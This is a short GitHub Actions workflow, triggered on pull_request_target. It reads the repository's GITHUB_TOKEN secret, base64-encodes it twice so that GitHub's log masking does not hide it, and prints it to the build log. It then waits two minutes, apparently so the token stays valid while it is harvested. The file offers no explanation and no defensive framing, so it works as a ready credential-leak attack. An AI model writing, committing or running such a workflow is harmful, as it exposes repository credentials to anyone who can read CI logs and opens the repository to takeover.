name: Double Encode GitHub Token on PR

on:
  pull_request_target:
    branches:
      - "*"

jobs:
  encode-token:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

    steps:
      - name: Double base64 encode GITHUB_TOKEN
        run: |
          echo "$GITHUB_TOKEN" | base64 | base64 > double_encoded.txt
          echo "Double Encoded GITHUB_TOKEN:"
          cat double_encoded.txt

      - name: Sleep for 2 minutes
        run: sleep 120
